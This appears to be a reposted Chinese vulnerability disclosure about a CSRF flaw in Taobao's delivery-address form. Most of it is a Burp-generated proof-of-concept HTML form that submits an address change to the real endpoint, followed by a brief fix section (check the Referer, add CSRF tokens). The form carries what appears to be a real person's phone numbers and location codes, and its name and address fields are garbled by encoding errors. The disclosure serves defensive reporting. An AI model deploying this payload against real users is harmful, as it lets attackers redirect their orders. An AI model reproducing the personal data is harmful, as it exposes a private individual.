admin管理员组

文章数量:1642346

漏洞细节

漏洞URL:http://member1.taobao/member/fresh/deliver_address.htm

收获地址细节:

表单信息内容

<html>
  <body>
    <form action="http://member1.taobao/member/fresh/deliver_address.htm" method="POST">
      <input type="hidden" name="action" value="DeliverAddressMgr" />
      <input type="hidden" name="event&#95;submit&#95;do&#95;save" value="anything" />
      <input type="hidden" name="from" value="mbis" />
      <input type="hidden" name="isFrame" value="false" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="lang" value="zh&#45;S" />
      <input type="hidden" name="&#95;tb&#95;token&#95;" value="OXM1aifkM5p" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="x" value="25&#46;03945" />
      <input type="hidden" name="y" value="102&#46;714729" />
      <input type="hidden" name="reurl" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="prov" value="530000" />
      <input type="hidden" name="provExt" value="" />
      <input type="hidden" name="city" value="530100" />
      <input type="hidden" name="area" value="530102" />
      <input type="hidden" name="town" value="530102002" />
      <input type="hidden" name="addressDetail" value="&#187;&#164;&#185;úÂ&#183;68ºÅ&#32;ÖÐ&#185;úÅ&#169;Òµ&#183;&#162;Õ&#185;ÒøÐÐÔÆÄÏÊ&#161;&#183;ÖÐÐ&#191;Í&#183;&#191;&#178;&#191;" />
      <input type="hidden" name="post" value="650001" />
      <input type="hidden" name="fullName" value="ÀîöÎ" />
      <input type="hidden" name="mobile&#95;area" value="1" />
      <input type="hidden" name="mobile" value="18206849493" />
      <input type="hidden" name="phone&#95;area" value="1" />
      <input type="hidden" name="phoneSection" value="0871" />
      <input type="hidden" name="phoneCode" value="3528991" />
      <input type="hidden" name="phoneExt" value="352799" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

使用burpsuite生成CSRF请求包,之后再浏览器当中进行访问

修复方案

1、检查Reference
2、添加CSRF-Token校验

 

参见:https://bugs.shuimugan/bug/view?bug_no=164471

本文标签: 收货淘宝网漏洞地址CSRF